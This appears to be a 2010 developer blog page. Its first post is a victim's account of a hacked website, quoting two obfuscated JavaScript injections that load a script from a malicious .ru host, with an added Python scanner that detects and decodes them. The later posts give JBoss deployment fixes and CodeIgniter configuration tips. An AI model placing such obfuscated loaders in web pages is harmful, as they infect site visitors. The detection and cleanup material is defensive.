Tuesday, January 26, 2010

Website hacked with random URL to access (http://ku6-com.haberturk.com.careerbuilder-com.webnetlinks.ru:8080/)

One of my websites has been hacked, either by some hacker or through one of the libraries I am using for my CodeIgniter project... I'm not sure whether it is due to a library or to my web hosting provider... I'm still investigating the issue.

It is trying to access a random URL such as:

http://ku6-com.haberturk.com.careerbuilder-com.webnetlinks.ru:8080/apple.com/apple.com/drudgereport.com/google.com/joy.cn/
Mostly the random URLs start with:
http://ku6-com.haberturk.com.careerbuilder-com.webnetlinks.ru:8080

Checking webnetlinks.ru, I got an alert from WOT (a Firefox add-on) that this site is unsafe.

Viewing my page source, I found:
  • The following script before the html tag

<script src='+'h^&)t($t)$#p&($^$:@$/)^)/)^@(k^^^!u)))6@(-&^c((!!o#@^m#.@&h#@a()
(b!e@)!r!##t(@^u&r$#k$.!#c)!o@(&m&@.^&@c@@#a^)r$#^!&e&$^@e@#)!r@&b^)u)^i!
(l)(d&@e)!#r!)(-(c!^^o$^m^^!.!!&w^&(e(!^b!#)^!n!#)e#
(&)t!&l##!^!i&@n#$k$&s)&#.&@!$r@)@u$!):$8)^&0$$!8&!0)
(#$/)$a)#p!$p$l&#e&#.^^@#c#o$$&)m$$#/!)a^@@$p)!p)l^#e&!.!$#c#(@o)$)^m((&
/&&d^&r$@u!@^d^)&g$$)e#$@r(^e(^!p&^o@!^&r^^)#t)&(#.)$^c()o^)m(@@
/@@g$&#^#o#o$g&l#!e(&.#!(c^&o^$m)#&&/$j$o#$)y).@^c&)n(@&/!@'.replace(/\$|\!|\)|
\^|#|@|\(|&/ig, '')+' defer=defer></scr'+'ipt>

  • At the end of the html tag, some hidden code:
82fd50e7972f75db5204eef49fd077cc


I didn't write any of the above, so I consider this the point to start searching from.

Note: I don't have any such issue on my local site.

Hope I'll find it soon.

Update 27/01, 1:30pm: Very bad, these scripts have been added to most HTML pages and to most JavaScript files. It seems the issue is not due to any CodeIgniter library but to some virus that can hack via FTP; it may be that my password is so weak that it could be hacked.

Update 29/01, 12:48pm: Now again, a new hack script has been added to the same site (I hadn't changed the FTP password yet). Here is the new script:


<!--82fd50e7972f75db5204eef49fd077cc--><script> try{window.onload=function(){document.write('<div id="megaid">youjizz-com.oneindia.in.d</div>');Lb4bz8i1odh = document.getElementById('megaid').innerHTML + 'u$#!$^o#@@w&a(n(@!-$$$c@(o$)!$m)&$@!.!)$(@t)^o($(p)!#l$i$@n#$^e&^(m@#&a@$^#r^^i@@^(n$e^##.#r&^$u(@^:)$D@!#E^()B^&U!(@&G#$#$/&&(s#^$p@(!(o$n&@i$)c@^h$#i^@$.^c&(o)$.(!j#@(p(!^^!/$s#!p(!&^o#n@)#i^!c##h)#)i(@.@!&^c(#o))@!.!j(^#p^^!!/@(^#@x)@t#!e!#$)n$)^d!(m@e@d((i&^!a^$!&).)@)#(c)$#o&^^#m#@$/!^^&g$@$o#o@!(g&!@#l#@#e#.@$@#c!(o^m)!^/&a!)l(!(i@c$!&e(^^.)!#^i^#$t($/@&'.replace(/@|\$|#|&|\^|\!|\)|\(/ig, '') ;document.write('<scr'+'ipt src="http://'+Lb4bz8i1odh.replace(/DEBUG/g,"></scr'+'ipt>');} } catch(Ijhdnoxns ) {}</script>
<!--82fd50e7972f75db5204eef49fd077cc-->

Related issues found on the net:
  1. http://blog.unmaskparasites.com/2009/12/23/from-hidden-iframes-to-obfuscated-scripts/
  2. http://blog.unmaskparasites.com/2009/09/23/10-ftp-clients-malware-steals-credentials-from/

Solutions (that may prevent this from happening again):
I'm using FileZilla as an FTP client.
  1. Change the FTP password
  2. Change the application password
  3. Scan the PC in use for viruses
  4. Remove all stored passwords from FTP clients
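
An added example, not part of the original post: a small scanner for a local copy of the web root that looks for the three indicators visible in the injected code above (the 32-hex-character marker comment, a quoted string that is stripped of padding characters with `.replace(/.../ig, '')`, and the split `</scr'+'ipt>` tag) and reports the string each padded literal hides. The function names and the sample are constructed for illustration, and the marker pattern is generalized to any 32-hex comment rather than the one value shown on this page.

```python
import re
from pathlib import Path

# Marker comment wrapped around the payload: 32 hex characters, as on this page.
MARKER = re.compile(r"<!--[0-9a-f]{32}-->", re.I)
# 'junk-padded literal'.replace(/\$|\!|#/ig, ''): a quoted string whose padding is
# stripped at run time by an alternation of single punctuation characters.
JUNK_REPLACE = re.compile(
    r"'([^'\n]{20,})'\s*\.replace\(\s*/((?:\\?[^\w\s/|]\|)+\\?[^\w\s/|])/[gi]*"
    r"\s*,\s*''\s*\)")
# Closing script tag split across a string concatenation.
SPLIT_TAG = re.compile(r"scr'\s*\+\s*'ipt", re.I)

def decode(literal, alternation):
    """Remove the padding characters named in the alternation, as the script would."""
    junk = {part[-1] for part in alternation.split("|")}
    return "".join(ch for ch in literal if ch not in junk)

def scan_text(text):
    """Return (kind, detail) pairs for every indicator found in one file's text."""
    found = [("marker-comment", m.group(0)) for m in MARKER.finditer(text)]
    found += [("junk-stripped-string", decode(m.group(1), m.group(2)))
              for m in JUNK_REPLACE.finditer(text)]
    found += [("split-script-tag", m.group(0)) for m in SPLIT_TAG.finditer(text)]
    return found

def scan_tree(root, suffixes=(".html", ".htm", ".php", ".js")):
    """Walk a local copy of the web root and map each affected file to its findings."""
    hits = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            found = scan_text(path.read_text(encoding="utf-8", errors="replace"))
            if found:
                hits[str(path)] = found
    return hits

# Constructed sample, not the payload from the page; it decodes to a reserved test host.
SAMPLE = (
    "<script src='+'h^t$t#p:@/)/e!x&a(m^p$l#e.@i)n!v&a(l^i$d#:8@0)8!0&/'"
    ".replace(/\\$|\\!|\\)|\\^|#|@|\\(|&/ig, '')+' defer=defer></scr'+'ipt>\n"
    "<html><body>hello</body></html>\n<!--0123456789abcdef0123456789abcdef-->"
)

if __name__ == "__main__":
    for kind, detail in scan_text(SAMPLE):
        print(f"{kind}: {detail}")
```

Run `scan_tree` against a downloaded copy of the site so the list of affected files can be compared with a clean backup before anything is re-uploaded.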

Monday, January 25, 2010

JBoss 4.2.2.GA - Deploying issue on class loading and out of memory

While deploying my applications with JBoss 4.2.2.GA using JDK 1.5, I ran into some class loading issues such as:

1. If you meet an error like this:
org.jboss.deployment.DeploymentException: Error while fixing table name; - nested throwable: (org.jboss.util.NestedSQLException: Could not create connection; - nested throwable: (org.jboss.resource.JBossResourceException: Failed to register driver for: oracle.jdbc.driver.OracleDriver; - nested throwable: (java.lang.ClassNotFoundException: No ClassLoaders found for: oracle.jdbc.driver.OracleDriver)); - nested throwable: (org.jboss.resource.JBossResourceException: Could not create connection; - nested throwable: (org.jboss.resource.JBossResourceException: Failed to register driver for: oracle.jdbc.driver.OracleDriver; - nested throwable: (java.lang.ClassNotFoundException: No ClassLoaders found for: oracle.jdbc.driver.OracleDriver))))


The Oracle JDBC driver is missing, so copy the Oracle JDBC driver (10.2.0.1.0) (ojdbc14.jar) to %JBOSS_HOME%/lib or to your server's %JBOSS_HOME%/server/default/lib directory.

2. If you see something like:

2010-01-25 15:03:27,113 DEBUG [org.jboss.web.tomcat.service.TomcatDeployer] Classes needed for clustered webapp unavailable
java.lang.NoClassDefFoundError: org/jgroups/blocks/MethodCall
at org.jboss.web.tomcat.service.session.JBossCacheService.(JBossCacheService.java:70)
at org.jboss.web.tomcat.service.session.JBossCacheManager.init(JBossCacheManager.java:157)
at org.jboss.web.tomcat.service.TomcatDeployer.performDeployInternal(TomcatDeployer.java:336)

Then try the following:
  • Define an isolated classloader. To do so, change %JBOSS_HOME%/server/default/conf/jboss-service.xml :
<mbean code="org.jboss.naming.NamingService" name="jboss:service=Naming" xmbean-dd="resource:xmdesc/NamingService-xmbean.xml">
[ ... ]
<attribute name="CallByValue">true</attribute>
[ ... ]
</mbean>

  • Change %JBOSS_HOME%/server/default/deploy/ear-deployer.xml :
<server>
[...]
<attribute name="Isolated">true</attribute>
[...]
<attribute name="CallByValue">true</attribute>
[...]
</server>

  • Change %JBOSS_HOME%/server/default/deploy/jboss-web.deployer/META-INF/jboss-service.xml :
[...]
<attribute name="Java2ClassLoadingCompliance">true</attribute>
[...]
<attribute name="UseJBossWebLoader">true</attribute>
[...]


3. When you want to deploy more than 2 applications on the same JBoss server instance, you may face unsuccessful deployments with Out of Memory errors.
So we need to increase the memory allocation for JBoss: add or change JAVA_OPTS in the file %JBOSS_HOME%/bin/run.bat as follows:
set JAVA_OPTS=%JAVA_OPTS% -Xms512m -Xmx1024m -XX:MaxPermSize=128m

My applications are now deployed.

Thursday, January 21, 2010

CodeIgniter - Remove index.php from URI

Normally with CodeIgniter, URIs look like http://domain/index.php/controller/method
You may want to remove index.php so that they become http://domain/controller/method.

Here is the way:
1. mod_rewrite needs to be enabled in your Apache server
2. Open config.php in application/config and replace $config['index_page'] = "index.php" with $config['index_page'] = ""

3. In the .htaccess file at the root of your website (the website root, where the system directory is), add the following lines:


RewriteEngine on
RewriteCond $1 !^(index\.php|resources|robots\.txt)
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php/$1 [L,QSA]

(In my case, the above changes work fine.)

4. In some cases, the default setting for uri_protocol does not work properly. To solve this problem, replace $config['uri_protocol'] = "AUTO" with $config['uri_protocol'] = "REQUEST_URI" in application/config/config.php

Enjoy,

Update 26/01: If you want URIs both with and without index.php to work, just skip step 4 (keep uri_protocol as AUTO).

CodeIgniter - Automatic config base url

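In CodeIgniter, the base URL has to be configured in config.php (param: $config["base_url"]), so when the domain changes it is easy to forget to update it and run into small errors. Here is a solution to that issue.

In config.php, replace the fixed URL with this configuration, which builds the URL from the current request. Note that $_SERVER['HTTP_HOST'] is taken from the request's Host header, so the result is only as trustworthy as the host names your web server accepts: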

$config['base_url'] = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == "on") ? "https" : "http");
$config['base_url'] .= "://".$_SERVER['HTTP_HOST'];
$config['base_url'] .= str_replace(basename($_SERVER['SCRIPT_NAME']),"",$_SERVER['SCRIPT_NAME']);

Source: http://codeigniter.com/wiki/Automatic_configbase_url/